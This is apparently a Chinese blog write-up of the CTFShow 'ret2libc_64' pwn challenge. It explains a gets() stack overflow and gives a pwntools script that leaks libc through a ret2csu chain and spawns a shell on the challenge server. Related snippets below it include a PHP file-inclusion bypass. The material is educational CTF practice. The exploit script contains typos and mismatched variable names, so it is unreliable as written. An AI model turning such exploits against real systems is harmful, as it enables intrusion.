CTF-Show-ret2libc_64(内部赛签到题)

已于 2024-04-12 03:18:21 修改
阅读量3.7k 收藏 3
点赞数
分类专栏: CTFShow刷题 文章标签: pwn
于 2021-11-23 16:04:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49666584/article/details/121495335
版权

0x00

checksec:

 

 

68e0372baab0422fb367eaca87265e0f.png

 64位程序,仅开NX

gdb调试:

85eae4eef5644bc6bca99ca9a980208a.png

 

 

有一个输出点和一个输入点

0x01

IDA看一下伪代码

int  main()
{
  char v4[160]; 
  setvbuf(_bss_start, 0LL, 1, 0LL);
  write(1, "[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n", 0x24uLL);
  gets(v4);//溢出点
  return 0;
}

gets函数存在溢出,无后门函数,无libc。

解题思路:

1-通过调用write函数打印出write函数的真实地址,并二次调用程序

2-用第一步得到的write函数地址泄露出libc版本(与libc库中的write函数地址进行对比,可能有多个符合,逐一尝试)

3-用得到的libc版本计算出libc在程序中的基地址(write函数真实地址-write函数在libc中的相对地址=libc基地址)

4-用libc基地址加上system函数和“/bin/sh”字符串在libc中的偏移地址计算出二者在程序中的真实地址。

5-第二次执行程序,利用栈溢出漏洞劫持程序,调用system(“/bin/sh”),拿到shell

0x02

exp:

from pwn import *
from LibcSearcher import *
context.log_level="debug"
binary="./ret2libc_64"
#sh=process(binary)
sh=remote("pwn.challenge.ctf.show",28055)
elf=ELF(binary)
write_got=elf.got['write']
main_addr=elf.symbols['main']
gadgets1 = 0x4006B6
gadgets2 = 0x4006A0
def csu(r12,r13,r14,r15,ret_addr):
    payload = b"A"*(0xA0+0x8)
    payload += p64(gadgets1)
    payload += b"b"*8
    payload += p64(0)
    payload += p64(1)
    payload += p64(r12)    //got
    payload += p64(r15)    //8
    payload += p64(r14)    //plt
    payload += p64(r13)    //1
    payload += p64(gadgets2)
    payload += b"c"*56
    payload += p64(ret_addr)//返回地址-main函数地址
    sh.sendline(payload)
sh.recvuntil("Pwn Me?\n")
csu(write_got,1,write_got,8,main_addr)
write_addr = u64(sh.recv(8))//write函数真实地址
libc-LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')//对应第三步
systemm_addr=libc_base+libc.dump('system')//对应第四步
binsh_addr=libc_base+libc.dump('str_bin_sh')//对应第四步
payload=b"A"*(0xA0+0x8)+p64(0x4006c3)+p64(binsh_addr)+p64(system_addr)
p.sendlineafter("Pwn Me?",payload)
p.interactive()

 

远程运行:

26263bf1aaac4dd6945b394274f87a57.png

 

运行后有几个libc版本的write函数地址都和本题一样,逐个尝试即可(此题程序时64位的直接排除掉32位版本的)

此题考察的比较基础,就是一个利用程序现有函数泄露libc版本配合栈溢出实现getshell的操作,麻烦一点的是64位程序需要调用寄存器,学习一点ret2csu即可

 

 

饭恩
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
17ret2libc1_64 pwn 入门
02-11
pwn 入门
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞...
ret2libc_x64一道经典例全过程解释
Aiyflwoers的博客
03-27 759
i love pwn
ctfshow-web内部
最新发布
2202_75812594的博客
04-20 888
函数来进行绕过(这里用两个hex()函数,只用一个会出现字符的情况,比如'o',笔者亲测),并且对我们的用户名进行了一个长度判断(>10则取前10位,所有我们可以用。这里的password并不会被注释掉,因为源代码换行符的存在,但原本的username会被通过内联注释掉方式注释掉(如下图)。, 其实可以发现,在登录页面的过滤远比注册页面多得多,明显的强过滤,所有我们完全可以利用注册页面来。这是我们唯一能看的两句sql语句,通过第二句发现,我们可以在。函数,检测我们的用户名是不是数字,这里我们可以利用。
内部 签到-ctf.show
yuqie的博客
06-14 357
这结果可是跑了好几个网站才出来,观察一下上面的图案,是十二星座,网上科普一下。的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。天秤座 ♎ U+264E(9月23日 - 10月23日)金牛座 ♉ U+2649(4月21日 - 5月21日)双子座 ♊ U+264A(5月22日 - 6月21日)巨蟹座 ♋ U+264B(6月22日 - 7月22日)狮子座 ♌ U+264C(7月23日 - 8月22日)处女座 ♍ U+264D(8月23日 - 9月22日)
CTF中的pwn基础
2301_81031055的博客
01-23 729
mprotect 函数用于设置一块内存的保护权限(将从 start 开始、长度为 len 的内存的保护属性修改为 prot 指定的值)elf跟libc是两个单独的文件,elf里的函数想要执行,就得先进入plt表,然后在进入got,got表里的是函数的真实地址。通过观察IDA中左边的函数,发现没有后门函数,也没有system函数考虑使用ret2libc解。通过调试发现,main函数与后门函数的地址相差一个字节,所以将09打包成一个字节。发现有栈溢出且溢出了一个字节,shift+f12查看发现有后门函数。
ctf-wiki 基本ROP
农夫果园好好喝的博客
07-11 431
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 流程...
linux中ret2libc入门与实践
counsellor的专栏
08-23 6733
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
ctfshow 内部 pwn 签到
SCP000111的博客
11-16 1586
ctfshow 内部 pwn 签到 找了在刷的中,不会做这道,找了好久没找到wp,搞了几天,还怀疑目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的目似乎与这道一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
《pwn》ret2libc2—x64简答例+脚本加解析
Aiyflwoers的博客
03-28 680
目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 4036
本文详解了pwn目中ret2libc的解思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体目具体的介绍了解pwn的完整过程。
CTFShow pwn07 (ret2libc-64bit
Mintind的博客
12-03 1064
CTFShow pwn07解记录
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF比PWNsgtlibc通用快速解框架
serfend's blog
07-07 1461
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解框架例:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例:buuctf pwnable_orw libc-leak_x86_puts 例:ctfshow ret2libc_64 内部_签到 libc-leak_x86_write_pure 例:buuctf jarvisoj_level1 libc-leak_x86_writ
jarvis oj level3/level4--多种解法实现ret2libc
超人学飞的日子
04-09 754
level3和level4都是ret2libc的典型目,只不过level3给了libc文件而level4没有给。 这里以leve3为例,使用多种方式实现ret2libc 一,使用给定的libc文件,计算偏移地址 整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行 基础原理:http://ww...
通过GOT覆写实现ret2libc - 64-bit Linux stack smashing tutorial: Part 3
HappyOrange2014的专栏
04-11 3894
对于如何绕过ASLR,原作者认为有很多办法可以做到,但这里写的方法是非常有意思的一种方式。通过GOT来泄漏库函数地址,以推导出libc中其他函数(如system)的地址,从而获得shell。以下过程给出了译者的个人调试截图,可在实践时参考。由于译者也是初学,翻译及调试过程中也存在一些疑问。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值